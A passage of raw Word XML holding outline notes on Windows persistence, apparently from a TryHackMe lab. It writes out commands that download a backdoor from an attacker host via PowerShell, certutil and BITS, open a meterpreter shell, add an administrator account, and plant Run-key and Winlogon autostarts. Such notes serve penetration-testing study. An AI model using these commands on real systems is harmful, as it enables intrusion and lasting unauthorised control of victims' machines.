    <w:p w14:paraId="660E5A83" w14:textId="279FAF93" w:rsidR="00235C4A" w:rsidRDefault="00235C4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Add this website to the zone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341F5885" w14:textId="132C8828" w:rsidR="00235C4A" w:rsidRDefault="00235C4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>IP address</w:t>
      </w:r>
      <w:r w:rsidR="00457B66">
        <w:t xml:space="preserve"> (http://&lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D3E5CA" w14:textId="2E702A58" w:rsidR="00235C4A" w:rsidRDefault="00235C4A" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20153435" w14:textId="0A4FA9A8" w:rsidR="00457B66" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00457B66" w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;ip&gt;:&lt;port</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00457B66">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE1BF78" w14:textId="628A7306" w:rsidR="00457B66" w:rsidRDefault="00457B66" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>download exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746B904F" w14:textId="34EF09A0" w:rsidR="00457B66" w:rsidRDefault="00457B66" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51511418" w14:textId="04F38A13" w:rsidR="00457B66" w:rsidRDefault="00457B66" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>creates meterpreter shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E04B0B4" w14:textId="7147102F" w:rsidR="00457B66" w:rsidRDefault="00457B66" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Deliver via Powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E44DB33" w14:textId="1057724F" w:rsidR="00457B66" w:rsidRDefault="00457B66" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Invoke-WebRequest </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;ip&gt;/&lt;exploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> filename.exe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C8F7A0" w14:textId="3E071F97" w:rsidR="00457B66" w:rsidRDefault="00457B66" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-Outfile .\backdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3253AAE3" w14:textId="388A5849" w:rsidR="00457B66" w:rsidRDefault="00457B66" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>execute backdoor .\backdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E69AAFB" w14:textId="0C9BA37E" w:rsidR="00457B66" w:rsidRDefault="00457B66" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Deliver via Certutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DBCDF9" w14:textId="2381215C" w:rsidR="00457B66" w:rsidRDefault="00457B66" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used from either CLI or Powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE99878" w14:textId="24606E36" w:rsidR="00457B66" w:rsidRDefault="00457B66" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">certutil -urlcache -split -f </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="004066E7" w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;ip&gt;/&lt;filename</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3386C19E" w14:textId="588400B9" w:rsidR="004066E7" w:rsidRDefault="004066E7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>execute .\backdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1CA926" w14:textId="78154B66" w:rsidR="004066E7" w:rsidRDefault="004066E7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Startup Folder Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0287C2" w14:textId="5E5F9E1D" w:rsidR="004066E7" w:rsidRDefault="004066E7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>move backdoor file to startup folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1541AACF" w14:textId="72D0422E" w:rsidR="004066E7" w:rsidRDefault="004066E7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cd ‘C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup’ in meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A87E057" w14:textId="029E8482" w:rsidR="004066E7" w:rsidRDefault="004066E7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>upload backdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164E1DC3" w14:textId="4EB21C9F" w:rsidR="004066E7" w:rsidRDefault="004066E7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Editing Registries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2200CE97" w14:textId="3EF92B7F" w:rsidR="004066E7" w:rsidRDefault="004066E7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Some Registries might be editable by low privilege users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78068E16" w14:textId="1BDC7679" w:rsidR="004066E7" w:rsidRDefault="004066E7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B9CF3A" w14:textId="70B5C56B" w:rsidR="00114C0C" w:rsidRDefault="00114C0C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>first move backdoor.exe to AppData\Roaming folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08639E93" w14:textId="1F73EC02" w:rsidR="00114C0C" w:rsidRDefault="00114C0C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>move or reupload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D31CEEF" w14:textId="5FABEF72" w:rsidR="00114C0C" w:rsidRDefault="00114C0C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run “shell” command in meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620DD6A2" w14:textId="2D1BB943" w:rsidR="00114C0C" w:rsidRDefault="00114C0C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>then run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9F0A58" w14:textId="5C0904A2" w:rsidR="00114C0C" w:rsidRDefault="00114C0C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\Current</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Version\Run” /v Backdoor /t REG-SZ /d “C:\Users\tryhackme\AppData\Roaming\backdoor</w:t>
      </w:r>
      <w:r w:rsidR="005E3479">
        <w:t>.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6103A27A" w14:textId="0A3F4391" w:rsidR="005E3479" w:rsidRDefault="005E3479" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>BITS Jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380FD650" w14:textId="7644A785" w:rsidR="005E3479" w:rsidRDefault="005E3479" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Background Intelligent Transfer Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DB83CA" w14:textId="2A64D53C" w:rsidR="005E3479" w:rsidRDefault="005E3479" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used for file transfer between machines (downloads/uploads) using idle network bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7955174A" w14:textId="4F700C54" w:rsidR="005E3479" w:rsidRDefault="005E3479" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Jobs are container that contain files that need to be transferred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1895CE3B" w14:textId="688143F0" w:rsidR="005E3479" w:rsidRDefault="005E3479" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>empty when created and needs to be populated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421832BE" w14:textId="407A37CC" w:rsidR="005E3479" w:rsidRDefault="005E3479" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>specify one or more files to be transferred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBB6740" w14:textId="422FC236" w:rsidR="005E3479" w:rsidRDefault="005E3479" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>also need to add source and destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3A6610" w14:textId="6F323E1B" w:rsidR="005E3479" w:rsidRDefault="005E3479" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BITS help menu </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bitsadmin in CLI/shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758575FC" w14:textId="63F1CF9B" w:rsidR="005E3479" w:rsidRDefault="005E3479" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Create Job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB65AA1" w14:textId="3A31C34D" w:rsidR="005E3479" w:rsidRDefault="005E3479" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bitsadmin /create backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221E2888" w14:textId="5592CF20" w:rsidR="005E3479" w:rsidRDefault="005E3479" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Add File for the Job that will be transferred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C20DD55" w14:textId="1C2A855E" w:rsidR="005E3479" w:rsidRDefault="00663DB9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bitsadmin /addfile backdoor “</w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;attacker ip&gt;/backdoor.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>” “C:\Users\tryhackme\Documents\backdoor.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264B29E9" w14:textId="25BDFF6F" w:rsidR="00663DB9" w:rsidRDefault="00663DB9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>To execute BITS backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FCFBCD" w14:textId="29018E80" w:rsidR="00663DB9" w:rsidRDefault="00663DB9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bitsadmin /SetNotifyCmdLine 1 cmd.exe “/c bitsadmin.exe /complete backdoor | start /B C:\Users\tryhackme\Documents\backdoor.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC49D84" w14:textId="5098DFBF" w:rsidR="00DA24BD" w:rsidRDefault="00DA24BD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>For added persistence, add a retry delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CC8C6A" w14:textId="7865503B" w:rsidR="00DA24BD" w:rsidRDefault="00DA24BD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bitsadmin /SetMinRetryDelay backdoor 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C3E69F" w14:textId="6F744DCE" w:rsidR="00DA24BD" w:rsidRDefault="00DA24BD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>start/resume job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD9DA36" w14:textId="5B39F727" w:rsidR="00DA24BD" w:rsidRDefault="00DA24BD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>need to have a webserver running so BITS can download the backdoor and Metasploit listening for connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CB7519" w14:textId="08053A33" w:rsidR="00DA24BD" w:rsidRDefault="00DA24BD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bitsadmin /resume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B96711F" w14:textId="5623B9AF" w:rsidR="00DA24BD" w:rsidRDefault="00DA24BD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>High Privilege User Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33974E8F" w14:textId="24EB475D" w:rsidR="00DA24BD" w:rsidRDefault="00836EBD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Creating another Administrator User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711D8B1B" w14:textId="7749B268" w:rsidR="00836EBD" w:rsidRDefault="00E568C1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614E43E1" w14:textId="462AA8A3" w:rsidR="00E568C1" w:rsidRDefault="00E568C1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">net user /add &lt;username&gt; &lt;password&gt; </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> create new user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEBE360" w14:textId="729F2565" w:rsidR="00E568C1" w:rsidRDefault="00E568C1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">net localgroup Administrators &lt;name&gt; /add </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> add user to local admin group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ABA738" w14:textId="79D99A2C" w:rsidR="00E568C1" w:rsidRDefault="00E568C1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">net localgroup Administrators </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> check successful add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFC883D" w14:textId="0D117D71" w:rsidR="00E568C1" w:rsidRDefault="00E568C1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Editing Registries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC0C549" w14:textId="13537864" w:rsidR="00E568C1" w:rsidRDefault="00E568C1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>backdoor Winlogon so whenever a user logs in the backdoor will get executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043E60AF" w14:textId="754B8875" w:rsidR="00E568C1" w:rsidRDefault="00E568C1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBEE850" w14:textId="40A15F8D" w:rsidR="00E568C1" w:rsidRDefault="00E568C1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon” /v Userinit /d “Userinit.exe, C:\Users\Administrator\Desktop\backdoor.exe” /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DB7812" w14:textId="200AF937" w:rsidR="00E568C1" w:rsidRDefault="004933FA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Persistence by Creating a Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60077B23" w14:textId="2F03B607" w:rsidR="004933FA" w:rsidRDefault="004933FA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Leveraging Powershell to execute backdoor</w:t>
      </w:r>
    </w:p>
